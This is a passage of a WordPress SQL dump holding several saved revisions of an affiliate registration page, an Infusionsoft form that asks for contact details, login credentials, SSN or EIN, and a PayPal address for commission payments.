value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:43:58', '2014-07-30 14:43:58', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1318, 4194, '2014-07-30 09:50:54', '2014-07-30 14:50:54', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;border: none;" cellspacing="0" cellpadding="10">\r\n<tbody>\r\n<tr>\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" border="0" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;" border="0">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:50:54', '2014-07-30 14:50:54', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1317, 4194, '2014-07-30 09:48:24', '2014-07-30 14:48:24', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;" border="0" cellspacing="0" cellpadding="10">\r\n<tbody border="0">\r\n<tr border="0">\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" border="0" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;" border="0">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" 